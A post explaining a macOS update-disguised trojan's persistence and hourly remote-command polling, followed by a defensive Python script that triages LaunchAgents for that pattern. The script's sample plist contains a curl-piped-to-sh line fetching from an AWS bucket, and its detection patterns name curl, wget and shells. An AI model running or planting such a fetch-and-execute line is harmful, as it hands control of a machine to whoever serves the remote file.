This post adds some detail, because the original article was very lacking.

According to an analysis done by Red Canary, the trojan reaches the user as update.pkg or updater.pkg and masquerades as a software update delivered through malicious advertisements. The ad might say something like "Cannot display this content as your version of xyz is out of date, click here to update", and the user unwittingly downloads the malware onto their machine.

The reason it is considered "high stealth" is mainly that it does not include its final payload and carries the means to delete itself. If the malware finds a file called ~/Library/._insu it uninstalls itself automatically. That could have been a way for the attackers to keep their own systems from being infected while testing, or it could be core to how the malware works, so that it avoids reinfecting machines on which it has already run its course. Either way, the fact that even a full analysis cannot reveal its end goal, combined with its ability to delete itself, has led malware researchers to conclude that it is concealing its actual malicious package.

In terms of what it does on a machine, it is anything but stealthy and relies on well-known malware techniques, such as installing a LaunchAgent so that its process is reliably started every time the user logs in (LaunchAgents run in the user's session, so they start at login rather than at boot). Once on a machine it downloads a file from an AWS-hosted server every hour and executes whatever shell commands that file contains. That means every infected machine will download and run whatever commands the attackers place on the server. The idea is that at some point in the future the malware will receive a command telling it to download the actual payload and execute it.
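The persistence and polling pattern described above (an hourly LaunchAgent that pulls content from an AWS-hosted endpoint and hands it to a shell, plus the ~/Library/._insu uninstall marker) is exactly what a triage script can look for on a Mac. The script below is an added example written for this post; it is not code from the original article or from Red Canary's analysis. The sample LaunchAgent plists, the label com.example.updater, the bucket name and the scoring thresholds are all constructed for illustration.

```python
"""Triage ~/Library/LaunchAgents for an hourly job that fetches remote content
from an AWS-hosted server and pipes it into a shell, and check for the
~/Library/._insu uninstall marker. Sample plists are constructed inline so the
script runs offline; in practice feed it the real plist files."""
import os
import plistlib
import re

# Heuristics (assumptions chosen for this example, not taken from the analysis).
AWS_HOST_RE = re.compile(r"amazonaws\.com|cloudfront\.net", re.I)
DOWNLOADER_RE = re.compile(r"\bcurl\b|\bwget\b")
SHELL_RE = re.compile(r"\b(sh|bash|zsh)\b|\beval\b")


def describe_agent(plist_bytes):
    """Extract the fields that matter for persistence triage from a plist."""
    p = plistlib.loads(plist_bytes)
    args = list(p.get("ProgramArguments") or [])
    if "Program" in p:                      # launchd allows Program instead of ProgramArguments
        args = [p["Program"]] + args
    return {
        "label": p.get("Label", "<no label>"),
        "run_at_load": bool(p.get("RunAtLoad", False)),
        "interval": p.get("StartInterval"),   # seconds between launches, if set
        "command": " ".join(str(a) for a in args),
    }


def suspicious_reasons(info):
    """Return the list of indicators a single agent matches."""
    reasons = []
    if info["interval"] and 1800 <= info["interval"] <= 7200:
        reasons.append("polls on a roughly hourly interval")
    if AWS_HOST_RE.search(info["command"]):
        reasons.append("contacts an AWS-hosted endpoint")
    if DOWNLOADER_RE.search(info["command"]) and SHELL_RE.search(info["command"]):
        reasons.append("downloads remote content and hands it to a shell")
    if info["run_at_load"]:
        reasons.append("starts at login (RunAtLoad)")
    return reasons


def triage(agents):
    """agents: mapping of plist path -> plist bytes. Returns {path: reasons}
    for agents matching at least two indicators, so a plain RunAtLoad helper
    on its own is not flagged."""
    findings = {}
    for path, data in agents.items():
        reasons = suspicious_reasons(describe_agent(data))
        if len(reasons) >= 2:
            findings[path] = reasons
    return findings


def uninstall_marker_present(library_dir):
    """The sample removes itself when ~/Library/._insu exists. Its presence on a
    host nobody cleaned is worth recording during an investigation."""
    return os.path.exists(os.path.join(library_dir, "._insu"))


# Constructed sample input: one agent matching the described behaviour, one benign.
SAMPLE_AGENTS = {
    "~/Library/LaunchAgents/com.example.updater.plist": plistlib.dumps({
        "Label": "com.example.updater",
        "RunAtLoad": True,
        "StartInterval": 3600,
        "ProgramArguments": [
            "/bin/sh", "-c",
            "curl -s https://example-bucket.s3.amazonaws.com/version.json | sh",
        ],
    }),
    "~/Library/LaunchAgents/com.example.backup.plist": plistlib.dumps({
        "Label": "com.example.backup",
        "RunAtLoad": True,
        "ProgramArguments": ["/usr/local/bin/backup", "--quiet"],
    }),
}


if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_AGENTS).items():
        print(path)
        for r in reasons:
            print("  -", r)
    home_lib = os.path.expanduser("~/Library")
    print("uninstall marker present:", uninstall_marker_present(home_lib))
```

To run it against a live machine, read each file in ~/Library/LaunchAgents (and /Library/LaunchAgents for system-wide agents) into the mapping instead of SAMPLE_AGENTS. The two-indicator threshold is deliberate: an hourly StartInterval or a RunAtLoad key alone is normal for legitimate helpers, while the combination of hourly polling, an AWS host and a curl-into-shell pipeline is what the described sample does.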